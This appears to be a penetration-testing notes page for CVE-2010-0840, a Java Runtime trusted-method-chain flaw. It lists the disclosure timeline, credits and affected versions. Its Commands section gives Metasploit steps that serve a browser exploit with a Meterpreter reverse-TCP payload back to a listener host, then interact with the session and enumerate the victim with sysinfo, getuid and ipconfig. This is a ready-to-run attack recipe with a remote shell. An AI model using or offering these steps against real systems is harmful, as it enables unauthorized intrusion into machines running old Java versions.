CVE-2010-0840 : Java Statement.invoke Trusted Method Chain Exploit

Timeline :

Vulnerability reported to Oracle by ZDI the 2009-11-24
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-08-20

    PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-0840
ZDI-10-056

    Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 18

    Description :

This module exploits a vulnerability in Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

    Commands :

use multi/browser/java_trusted_chain
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig